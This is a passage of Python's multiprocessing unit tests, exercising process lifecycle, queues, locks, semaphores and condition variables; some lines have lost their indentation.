self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
    """cpu_count() returns a positive int (fall back to 1 if undetermined)."""
    try:
        cpus = multiprocessing.cpu_count()
    except NotImplementedError:
        cpus = 1
    # assertIsInstance / assertGreaterEqual replace assertTrue on compound
    # expressions: same checks, but with useful failure messages.
    self.assertIsInstance(cpus, int)
    self.assertGreaterEqual(cpus, 1)
# active_children() must track a child only while it is running.
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
# Child-side helper: reports its id path, then spawns two children of its
# own until depth 2, building a breadth-2 process tree.
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
# Depth-first order of the recursive spawn tree.
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
# Child-side helper for test_sentinel: blocks until the event is set.
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
    def test_close(self):
        # Process.close() must be refused while the child is alive, must
        # invalidate the handle afterwards (is_alive/join/terminate raise
        # ValueError), must be idempotent, and must drop the last reference
        # so the Process object can be garbage collected.
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        q = self.Queue()
        p = self.Process(target=self._test_close, kwargs={'q': q})
        p.daemon = True
        p.start()
        self.assertEqual(p.is_alive(), True)
        # Child is still alive, cannot close
        with self.assertRaises(ValueError):
            p.close()
        q.put(None)
        p.join()
        self.assertEqual(p.is_alive(), False)
        self.assertEqual(p.exitcode, 0)
        p.close()
        with self.assertRaises(ValueError):
            p.is_alive()
        with self.assertRaises(ValueError):
            p.join()
        with self.assertRaises(ValueError):
            p.terminate()
        # close() is idempotent.
        p.close()
        wr = weakref.ref(p)
        del p
        gc.collect()
        self.assertIs(wr(), None)
        close_queue(q)
    def test_many_processes(self):
        # Start many children at once (fewer under the slower 'spawn' start
        # method), both letting them finish normally and terminating them.
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        sm = multiprocessing.get_start_method()
        N = 5 if sm == 'spawn' else 100
        # Try to overwhelm the forkserver loop with events
        procs = [self.Process(target=self._test_sleep, args=(0.01,))
                 for i in range(N)]
        for p in procs:
            p.start()
        for p in procs:
            join_process(p)
        for p in procs:
            self.assertEqual(p.exitcode, 0)
        procs = [self.Process(target=self._sleep_some)
                 for i in range(N)]
        for p in procs:
            p.start()
        time.sleep(0.001)  # let the children start...
        for p in procs:
            p.terminate()
        for p in procs:
            join_process(p)
        if os.name != 'nt':
            exitcodes = [-signal.SIGTERM]
            if sys.platform == 'darwin':
                # bpo-31510: On macOS, killing a freshly started process with
                # SIGTERM sometimes kills the process with SIGKILL.
                exitcodes.append(-signal.SIGKILL)
            for p in procs:
                self.assertIn(p.exitcode, exitcodes)
    def test_lose_target_ref(self):
        # After start(), the parent-side Process must not keep a reference
        # to the target callable: once `del c` removes the last reference,
        # the weakref must be dead, while the child still runs the callable.
        c = DummyCallable()
        wr = weakref.ref(c)
        q = self.Queue()
        p = self.Process(target=c, args=(q, c))
        del c
        p.start()
        p.join()
        self.assertIs(wr(), None)
        self.assertEqual(q.get(), 5)
        close_queue(q)
    @classmethod
    def _test_child_fd_inflation(self, evt, q):
        # NOTE(review): declared @classmethod but the first parameter is
        # named `self`; it actually receives the class.
        # Child target: report this process's fd count, then block on evt.
        q.put(test.support.fd_count())
        evt.wait()
    def test_child_fd_inflation(self):
        # Number of fds in child processes should not grow with the
        # number of running children.
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        sm = multiprocessing.get_start_method()
        if sm == 'fork':
            # The fork method by design inherits all fds from the parent,
            # trying to go against it is a lost battle
            self.skipTest('test not appropriate for {}'.format(sm))
        N = 5
        evt = self.Event()
        q = self.Queue()
        procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
                 for i in range(N)]
        for p in procs:
            p.start()
        try:
            # All children should report the same fd count.
            fd_counts = [q.get() for i in range(N)]
            self.assertEqual(len(set(fd_counts)), 1, fd_counts)
        finally:
            evt.set()
            for p in procs:
                p.join()
            close_queue(q)
    @classmethod
    def _test_wait_for_threads(self, evt):
        # Child target: func1 (non-daemon thread) sets the event after
        # 0.5 s; func2 (daemon thread) would clear it after 20 s but must
        # never get the chance, since process shutdown only waits for
        # non-daemon threads.
        def func1():
            time.sleep(0.5)
            evt.set()
        def func2():
            time.sleep(20)
            evt.clear()
        threading.Thread(target=func1).start()
        threading.Thread(target=func2, daemon=True).start()
    def test_wait_for_threads(self):
        # A child process should wait for non-daemonic threads to end
        # before exiting
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        evt = self.Event()
        proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
        proc.start()
        proc.join()
        self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
    def test_error_on_stdio_flush_1(self):
        # Check that Process works with broken standard streams
        # (closed StringIO or None), broken by the *parent* before start().
        streams = [io.StringIO(), None]
        streams[0].close()
        for stream_name in ('stdout', 'stderr'):
            for stream in streams:
                old_stream = getattr(sys, stream_name)
                setattr(sys, stream_name, stream)
                try:
                    evt = self.Event()
                    proc = self.Process(target=self._test_error_on_stdio_flush,
                                        args=(evt,))
                    proc.start()
                    proc.join()
                    self.assertTrue(evt.is_set())
                    self.assertEqual(proc.exitcode, 0)
                finally:
                    setattr(sys, stream_name, old_stream)
    def test_error_on_stdio_flush_2(self):
        # Same as test_error_on_stdio_flush_1(), but standard streams are
        # broken by the child process
        for stream_name in ('stdout', 'stderr'):
            for action in ('close', 'remove'):
                old_stream = getattr(sys, stream_name)
                try:
                    evt = self.Event()
                    proc = self.Process(target=self._test_error_on_stdio_flush,
                                        args=(evt, {stream_name: action}))
                    proc.start()
                    proc.join()
                    self.assertTrue(evt.is_set())
                    self.assertEqual(proc.exitcode, 0)
                finally:
                    setattr(sys, stream_name, old_stream)
    @classmethod
    def _sleep_and_set_event(self, evt, delay=0.0):
        # Child target: set the event after an optional delay.
        time.sleep(delay)
        evt.set()
    def check_forkserver_death(self, signum):
        # bpo-31308: if the forkserver process has died, we should still
        # be able to create and run new Process instances (the forkserver
        # is implicitly restarted).
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        sm = multiprocessing.get_start_method()
        if sm != 'forkserver':
            # Only the forkserver start method keeps a forkserver process
            # around to kill.
            self.skipTest('test not appropriate for {}'.format(sm))
        from multiprocessing.forkserver import _forkserver
        _forkserver.ensure_running()
        # First process sleeps 500 ms
        delay = 0.5
        evt = self.Event()
        proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
        proc.start()
        pid = _forkserver._forkserver_pid
        os.kill(pid, signum)
        # give time to the fork server to die and time to proc to complete
        time.sleep(delay * 2.0)
        evt2 = self.Event()
        proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
        proc2.start()
        proc2.join()
        self.assertTrue(evt2.is_set())
        self.assertEqual(proc2.exitcode, 0)
        proc.join()
        self.assertTrue(evt.is_set())
        # The first child may exit cleanly (0) or report failure (255)
        # depending on when the forkserver died.
        self.assertIn(proc.exitcode, (0, 255))
    def test_forkserver_sigint(self):
        # Catchable signal
        self.check_forkserver_death(signal.SIGINT)
    def test_forkserver_sigkill(self):
        # Uncatchable signal
        if os.name != 'nt':
            self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
    """Worker process that upper-cases strings received over a pipe."""
    def __init__(self):
        super().__init__()
        self.child_conn, self.parent_conn = multiprocessing.Pipe()
    def run(self):
        # Child side: drop the parent end of the pipe, then serve
        # requests until a None sentinel arrives.
        self.parent_conn.close()
        while True:
            request = self.child_conn.recv()
            if request is None:
                break
            self.child_conn.send(request.upper())
        self.child_conn.close()
    def submit(self, s):
        """Send one string to the worker and return its upper-cased reply."""
        assert type(s) is str
        self.parent_conn.send(s)
        return self.parent_conn.recv()
    def stop(self):
        """Ask the worker to exit, then close both pipe ends."""
        self.parent_conn.send(None)
        self.parent_conn.close()
        self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
    """Tests for subclassing multiprocessing.Process and exit behavior."""
    ALLOWED_TYPES = ('processes',)
    def test_subclassing(self):
        uppercaser = _UpperCaser()
        uppercaser.daemon = True
        uppercaser.start()
        self.assertEqual(uppercaser.submit('hello'), 'HELLO')
        self.assertEqual(uppercaser.submit('world'), 'WORLD')
        uppercaser.stop()
        uppercaser.join()
    def test_stderr_flush(self):
        # sys.stderr is flushed at process shutdown (issue #13812)
        if self.TYPE == "threads":
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        testfn = test.support.TESTFN
        self.addCleanup(test.support.unlink, testfn)
        proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
        proc.start()
        proc.join()
        with open(testfn, 'r') as f:
            err = f.read()
            # The whole traceback was printed
            self.assertIn("ZeroDivisionError", err)
            self.assertIn("test_multiprocessing.py", err)
            self.assertIn("1/0 # MARKER", err)
    @classmethod
    def _test_stderr_flush(cls, testfn):
        # Child target: redirect stderr to testfn, then crash so the
        # traceback must be flushed at shutdown.
        fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
        sys.stderr = open(fd, 'w', closefd=False)
        1/0 # MARKER
    @classmethod
    def _test_sys_exit(cls, reason, testfn):
        # Child target: redirect stderr to testfn and exit with `reason`.
        fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
        sys.stderr = open(fd, 'w', closefd=False)
        sys.exit(reason)
    def test_sys_exit(self):
        # See Issue 13854
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        testfn = test.support.TESTFN
        self.addCleanup(test.support.unlink, testfn)
        # Non-int sys.exit() arguments yield exit code 1 and are printed
        # to stderr.
        for reason in (
            [1, 2, 3],
            'ignore this',
        ):
            p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
            p.daemon = True
            p.start()
            join_process(p)
            self.assertEqual(p.exitcode, 1)
            with open(testfn, 'r') as f:
                content = f.read()
            self.assertEqual(content.rstrip(), str(reason))
            os.unlink(testfn)
        # Int-like arguments become the exit code directly.
        for reason in (True, False, 8):
            p = self.Process(target=sys.exit, args=(reason,))
            p.daemon = True
            p.start()
            join_process(p)
            self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
    """Return True if *q* holds no items, using empty() when available."""
    if not hasattr(q, 'empty'):
        # Some proxy queues lack empty(); fall back to qsize().
        return q.qsize() == 0
    return q.empty()
def queue_full(q, maxsize):
    """Return True if *q* holds *maxsize* items, using full() when available."""
    if not hasattr(q, 'full'):
        # Some proxy queues lack full(); fall back to qsize().
        return q.qsize() == maxsize
    return q.full()
class _TestQueue(BaseTestCase):
    """Tests for Queue/JoinableQueue put/get semantics and the feeder thread."""
    @classmethod
    def _test_put(cls, queue, child_can_start, parent_can_continue):
        # Child target: drain the six items put by the parent, then signal.
        child_can_start.wait()
        for i in range(6):
            queue.get()
        parent_can_continue.set()
    def test_put(self):
        MAXSIZE = 6
        queue = self.Queue(maxsize=MAXSIZE)
        child_can_start = self.Event()
        parent_can_continue = self.Event()
        proc = self.Process(
            target=self._test_put,
            args=(queue, child_can_start, parent_can_continue)
            )
        proc.daemon = True
        proc.start()
        self.assertEqual(queue_empty(queue), True)
        self.assertEqual(queue_full(queue, MAXSIZE), False)
        # Exercise every put() calling convention.
        queue.put(1)
        queue.put(2, True)
        queue.put(3, True, None)
        queue.put(4, False)
        queue.put(5, False, None)
        queue.put_nowait(6)
        # the values may be in buffer but not yet in pipe so sleep a bit
        time.sleep(DELTA)
        self.assertEqual(queue_empty(queue), False)
        self.assertEqual(queue_full(queue, MAXSIZE), True)
        put = TimingWrapper(queue.put)
        put_nowait = TimingWrapper(queue.put_nowait)
        # Non-blocking puts on a full queue must fail immediately;
        # blocking puts must fail after roughly the requested timeout.
        self.assertRaises(pyqueue.Full, put, 7, False)
        self.assertTimingAlmostEqual(put.elapsed, 0)
        self.assertRaises(pyqueue.Full, put, 7, False, None)
        self.assertTimingAlmostEqual(put.elapsed, 0)
        self.assertRaises(pyqueue.Full, put_nowait, 7)
        self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
        self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
        self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
        self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
        self.assertTimingAlmostEqual(put.elapsed, 0)
        self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
        self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
        child_can_start.set()
        parent_can_continue.wait()
        self.assertEqual(queue_empty(queue), True)
        self.assertEqual(queue_full(queue, MAXSIZE), False)
        proc.join()
        close_queue(queue)
    @classmethod
    def _test_get(cls, queue, child_can_start, parent_can_continue):
        # Child target: feed items 2..5 to the parent, then signal.
        child_can_start.wait()
        #queue.put(1)
        queue.put(2)
        queue.put(3)
        queue.put(4)
        queue.put(5)
        parent_can_continue.set()
    def test_get(self):
        queue = self.Queue()
        child_can_start = self.Event()
        parent_can_continue = self.Event()
        proc = self.Process(
            target=self._test_get,
            args=(queue, child_can_start, parent_can_continue)
            )
        proc.daemon = True
        proc.start()
        self.assertEqual(queue_empty(queue), True)
        child_can_start.set()
        parent_can_continue.wait()
        time.sleep(DELTA)
        self.assertEqual(queue_empty(queue), False)
        # Hangs unexpectedly, remove for now
        #self.assertEqual(queue.get(), 1)
        # Exercise every get() calling convention.
        self.assertEqual(queue.get(True, None), 2)
        self.assertEqual(queue.get(True), 3)
        self.assertEqual(queue.get(timeout=1), 4)
        self.assertEqual(queue.get_nowait(), 5)
        self.assertEqual(queue_empty(queue), True)
        get = TimingWrapper(queue.get)
        get_nowait = TimingWrapper(queue.get_nowait)
        # Non-blocking gets on an empty queue must fail immediately;
        # blocking gets must fail after roughly the requested timeout.
        self.assertRaises(pyqueue.Empty, get, False)
        self.assertTimingAlmostEqual(get.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get, False, None)
        self.assertTimingAlmostEqual(get.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get_nowait)
        self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
        self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
        self.assertTimingAlmostEqual(get.elapsed, 0)
        self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
        proc.join()
        close_queue(queue)
    @classmethod
    def _test_fork(cls, queue):
        for i in range(10, 20):
            queue.put(i)
        # note that at this point the items may only be buffered, so the
        # process cannot shutdown until the feeder thread has finished
        # pushing items onto the pipe.
    def test_fork(self):
        # Old versions of Queue would fail to create a new feeder
        # thread for a forked process if the original process had its
        # own feeder thread. This test checks that this no longer
        # happens.
        queue = self.Queue()
        # put items on queue so that main process starts a feeder thread
        for i in range(10):
            queue.put(i)
        # wait to make sure thread starts before we fork a new process
        time.sleep(DELTA)
        # fork process
        p = self.Process(target=self._test_fork, args=(queue,))
        p.daemon = True
        p.start()
        # check that all expected items are in the queue
        for i in range(20):
            self.assertEqual(queue.get(), i)
        self.assertRaises(pyqueue.Empty, queue.get, False)
        p.join()
        close_queue(queue)
    def test_qsize(self):
        q = self.Queue()
        try:
            self.assertEqual(q.qsize(), 0)
        except NotImplementedError:
            # qsize() relies on sem_getvalue, absent on some platforms.
            self.skipTest('qsize method not implemented')
        q.put(1)
        self.assertEqual(q.qsize(), 1)
        q.put(5)
        self.assertEqual(q.qsize(), 2)
        q.get()
        self.assertEqual(q.qsize(), 1)
        q.get()
        self.assertEqual(q.qsize(), 0)
        close_queue(q)
    @classmethod
    def _test_task_done(cls, q):
        # Worker: consume items until the None sentinel, acknowledging each.
        for obj in iter(q.get, None):
            time.sleep(DELTA)
            q.task_done()
    def test_task_done(self):
        queue = self.JoinableQueue()
        workers = [self.Process(target=self._test_task_done, args=(queue,))
                   for i in range(4)]
        for p in workers:
            p.daemon = True
            p.start()
        for i in range(10):
            queue.put(i)
        # join() returns only once every put item has been task_done()'d.
        queue.join()
        for p in workers:
            queue.put(None)
        for p in workers:
            p.join()
        close_queue(queue)
    def test_no_import_lock_contention(self):
        with test.support.temp_cwd():
            module_name = 'imported_by_an_imported_module'
            with open(module_name + '.py', 'w') as f:
                f.write("""if 1:
                    import multiprocessing
                    q = multiprocessing.Queue()
                    q.put('knock knock')
                    q.get(timeout=3)
                    q.close()
                    del q
                """)
            with test.support.DirsOnSysPath(os.getcwd()):
                try:
                    __import__(module_name)
                except pyqueue.Empty:
                    self.fail("Probable regression on import lock contention;"
                              " see Issue #22853")
    def test_timeout(self):
        q = multiprocessing.Queue()
        start = time.monotonic()
        self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
        delta = time.monotonic() - start
        # bpo-30317: Tolerate a delta of 100 ms because of the bad clock
        # resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
        # failed because the delta was only 135.8 ms.
        self.assertGreaterEqual(delta, 0.100)
        close_queue(q)
    def test_queue_feeder_donot_stop_onexc(self):
        # bpo-30414: verify feeder handles exceptions correctly
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        class NotSerializable(object):
            def __reduce__(self):
                raise AttributeError
        with test.support.captured_stderr():
            q = self.Queue()
            q.put(NotSerializable())
            q.put(True)
            # bpo-30595: use a timeout of 1 second for slow buildbots
            self.assertTrue(q.get(timeout=1.0))
            close_queue(q)
        with test.support.captured_stderr():
            # bpo-33078: verify that the queue size is correctly handled
            # on errors.
            q = self.Queue(maxsize=1)
            q.put(NotSerializable())
            q.put(True)
            try:
                self.assertEqual(q.qsize(), 1)
            except NotImplementedError:
                # qsize is not available on all platform as it
                # relies on sem_getvalue
                pass
            # bpo-30595: use a timeout of 1 second for slow buildbots
            self.assertTrue(q.get(timeout=1.0))
            # Check that the size of the queue is correct
            self.assertTrue(q.empty())
            close_queue(q)
    def test_queue_feeder_on_queue_feeder_error(self):
        # bpo-30006: verify feeder handles exceptions using the
        # _on_queue_feeder_error hook.
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        class NotSerializable(object):
            """Mock unserializable object"""
            def __init__(self):
                self.reduce_was_called = False
                self.on_queue_feeder_error_was_called = False
            def __reduce__(self):
                self.reduce_was_called = True
                raise AttributeError
        class SafeQueue(multiprocessing.queues.Queue):
            """Queue with overloaded _on_queue_feeder_error hook"""
            @staticmethod
            def _on_queue_feeder_error(e, obj):
                if (isinstance(e, AttributeError) and
                        isinstance(obj, NotSerializable)):
                    obj.on_queue_feeder_error_was_called = True
        not_serializable_obj = NotSerializable()
        # The captured_stderr reduces the noise in the test report
        with test.support.captured_stderr():
            q = SafeQueue(ctx=multiprocessing.get_context())
            q.put(not_serializable_obj)
            # Verify that q is still functioning correctly
            q.put(True)
            self.assertTrue(q.get(timeout=1.0))
        # Assert that the serialization and the hook have been called correctly
        self.assertTrue(not_serializable_obj.reduce_was_called)
        self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
    """Tests for Lock and RLock acquire/release semantics."""
    def test_lock(self):
        lock = self.Lock()
        self.assertEqual(lock.acquire(), True)
        # A held non-recursive lock cannot be acquired again.
        self.assertEqual(lock.acquire(False), False)
        self.assertEqual(lock.release(), None)
        # Releasing an unheld lock raises (exception type differs between
        # process- and thread-backed locks).
        self.assertRaises((ValueError, threading.ThreadError), lock.release)
    def test_rlock(self):
        lock = self.RLock()
        # A recursive lock may be acquired repeatedly by the same owner and
        # must be released the same number of times.
        self.assertEqual(lock.acquire(), True)
        self.assertEqual(lock.acquire(), True)
        self.assertEqual(lock.acquire(), True)
        self.assertEqual(lock.release(), None)
        self.assertEqual(lock.release(), None)
        self.assertEqual(lock.release(), None)
        self.assertRaises((AssertionError, RuntimeError), lock.release)
    def test_lock_context(self):
        with self.Lock():
            pass
class _TestSemaphore(BaseTestCase):
    """Tests for Semaphore and BoundedSemaphore."""
    def _test_semaphore(self, sem):
        # Helper: exercise a semaphore created with an initial value of 2.
        self.assertReturnsIfImplemented(2, get_value, sem)
        self.assertEqual(sem.acquire(), True)
        self.assertReturnsIfImplemented(1, get_value, sem)
        self.assertEqual(sem.acquire(), True)
        self.assertReturnsIfImplemented(0, get_value, sem)
        self.assertEqual(sem.acquire(False), False)
        self.assertReturnsIfImplemented(0, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(1, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(2, get_value, sem)
    def test_semaphore(self):
        sem = self.Semaphore(2)
        self._test_semaphore(sem)
        # A plain Semaphore may be released above its initial value.
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(3, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(4, get_value, sem)
    def test_bounded_semaphore(self):
        sem = self.BoundedSemaphore(2)
        self._test_semaphore(sem)
        # Currently fails on OS/X
        #if HAVE_GETVALUE:
        #    self.assertRaises(ValueError, sem.release)
        #    self.assertReturnsIfImplemented(2, get_value, sem)
    def test_timeout(self):
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        sem = self.Semaphore(0)
        acquire = TimingWrapper(sem.acquire)
        # Non-blocking acquires fail immediately (timeout ignored when
        # block=False); blocking acquires honor the timeout.
        self.assertEqual(acquire(False), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
        self.assertEqual(acquire(False, None), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
        self.assertEqual(acquire(False, TIMEOUT1), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0)
        self.assertEqual(acquire(True, TIMEOUT2), False)
        self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
        self.assertEqual(acquire(timeout=TIMEOUT3), False)
        self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
    """Tests for Condition notify/wait/wait_for across processes and threads."""
    @classmethod
    def f(cls, cond, sleeping, woken, timeout=None):
        # Worker: announce via `sleeping`, wait on the condition (with an
        # optional timeout), then announce wake-up via `woken`.
        cond.acquire()
        sleeping.release()
        cond.wait(timeout)
        woken.release()
        cond.release()
    def assertReachesEventually(self, func, value):
        # Poll func() up to ~10*DELTA until it returns value, then assert.
        for i in range(10):
            try:
                if func() == value:
                    break
            except NotImplementedError:
                break
            time.sleep(DELTA)
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(value, func)
    def check_invariant(self, cond):
        # this is only supposed to succeed when there are no sleepers
        if self.TYPE == 'processes':
            try:
                sleepers = (cond._sleeping_count.get_value() -
                            cond._woken_count.get_value())
                self.assertEqual(sleepers, 0)
                self.assertEqual(cond._wait_semaphore.get_value(), 0)
            except NotImplementedError:
                pass
    def test_notify(self):
        cond = self.Condition()
        sleeping = self.Semaphore(0)
        woken = self.Semaphore(0)
        p = self.Process(target=self.f, args=(cond, sleeping, woken))
        p.daemon = True
        p.start()
        self.addCleanup(p.join)
        p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
        p.daemon = True
        p.start()
        self.addCleanup(p.join)
        # wait for both children to start sleeping
        sleeping.acquire()
        sleeping.acquire()
        # check no process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(0, get_value, woken)
        # wake up one process/thread
        cond.acquire()
        cond.notify()
        cond.release()
        # check one process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(1, get_value, woken)
        # wake up another
        cond.acquire()
        cond.notify()
        cond.release()
        # check other has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(2, get_value, woken)
        # check state is not mucked up
        self.check_invariant(cond)
        p.join()
    def test_notify_all(self):
        cond = self.Condition()
        sleeping = self.Semaphore(0)
        woken = self.Semaphore(0)
        # start some threads/processes which will timeout
        for i in range(3):
            p = self.Process(target=self.f,
                             args=(cond, sleeping, woken, TIMEOUT1))
            p.daemon = True
            p.start()
            self.addCleanup(p.join)
            t = threading.Thread(target=self.f,
                                 args=(cond, sleeping, woken, TIMEOUT1))
            t.daemon = True
            t.start()
            self.addCleanup(t.join)
        # wait for them all to sleep
        for i in range(6):
            sleeping.acquire()
        # check they have all timed out
        for i in range(6):
            woken.acquire()
        self.assertReturnsIfImplemented(0, get_value, woken)
        # check state is not mucked up
        self.check_invariant(cond)
        # start some more threads/processes
        for i in range(3):
            p = self.Process(target=self.f, args=(cond, sleeping, woken))
            p.daemon = True
            p.start()
            self.addCleanup(p.join)
            t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
            t.daemon = True
            t.start()
            self.addCleanup(t.join)
        # wait for them to all sleep
        for i in range(6):
            sleeping.acquire()
        # check no process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(0, get_value, woken)
        # wake them all up
        cond.acquire()
        cond.notify_all()
        cond.release()
        # check they have all woken
        self.assertReachesEventually(lambda: get_value(woken), 6)
        # check state is not mucked up
        self.check_invariant(cond)
    def test_notify_n(self):
        cond = self.Condition()
        sleeping = self.Semaphore(0)
        woken = self.Semaphore(0)
        # start some threads/processes
        for i in range(3):
            p = self.Process(target=self.f, args=(cond, sleeping, woken))
            p.daemon = True
            p.start()
            self.addCleanup(p.join)
            t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
            t.daemon = True
            t.start()
            self.addCleanup(t.join)
        # wait for them to all sleep
        for i in range(6):
            sleeping.acquire()
        # check no process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(0, get_value, woken)
        # wake some of them up
        cond.acquire()
        cond.notify(n=2)
        cond.release()
        # check 2 have woken
        self.assertReachesEventually(lambda: get_value(woken), 2)
        # wake the rest of them
        cond.acquire()
        cond.notify(n=4)
        cond.release()
        self.assertReachesEventually(lambda: get_value(woken), 6)
        # doesn't do anything more
        cond.acquire()
        cond.notify(n=3)
        cond.release()
        self.assertReturnsIfImplemented(6, get_value, woken)
        # check state is not mucked up
        self.check_invariant(cond)
    def test_timeout(self):
        cond = self.Condition()
        wait = TimingWrapper(cond.wait)
        cond.acquire()
        res = wait(TIMEOUT1)
        cond.release()
        # An un-notified wait must time out and return False.
        self.assertEqual(res, False)
        self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
    @classmethod
    def _test_waitfor_f(cls, cond, state):
        # Child target: hand control to the parent (state 0), then wait
        # for state to reach 4; exit code 1 signals failure.
        with cond:
            state.value = 0
            cond.notify()
            result = cond.wait_for(lambda : state.value==4)
            if not result or state.value != 4:
                sys.exit(1)
    @unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
    def test_waitfor(self):
        # based on test in test/lock_tests.py
        cond = self.Condition()
        state = self.Value('i', -1)
        p = self.Process(target=self._test_waitfor_f, args=(cond, state))
        p.daemon = True
        p.start()
        with cond:
            result = cond.wait_for(lambda : state.value==0)
            self.assertTrue(result)
            self.assertEqual(state.value, 0)
        for i in range(4):
            time.sleep(0.01)
            with cond:
                state.value += 1
                cond.notify()
        join_process(p)
        self.assertEqual(p.exitcode, 0)
    @classmethod
    def _test_waitfor_timeout_f(cls, cond, state, success, sem):
        # Child target: wait_for a state that never arrives; success means
        # the wait timed out within a sane window around `expected`.
        sem.release()
        with cond:
            expected = 0.1
            dt = time.monotonic()
            result = cond.wait_for(lambda : state.value==4, timeout=expected)
            dt = time.monotonic() - dt
            # borrow logic in assertTimeout() from test/lock_tests.py
            if not result and expected * 0.6 < dt < expected * 10.0:
                success.value = True
    @unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
    def test_waitfor_timeout(self):
        # based on test in test/lock_tests.py
        cond = self.Condition()
        state = self.Value('i', 0)
        success = self.Value('i', False)
        sem = self.Semaphore(0)
        p = self.Process(target=self._test_waitfor_timeout_f,
                         args=(cond, state, success, sem))
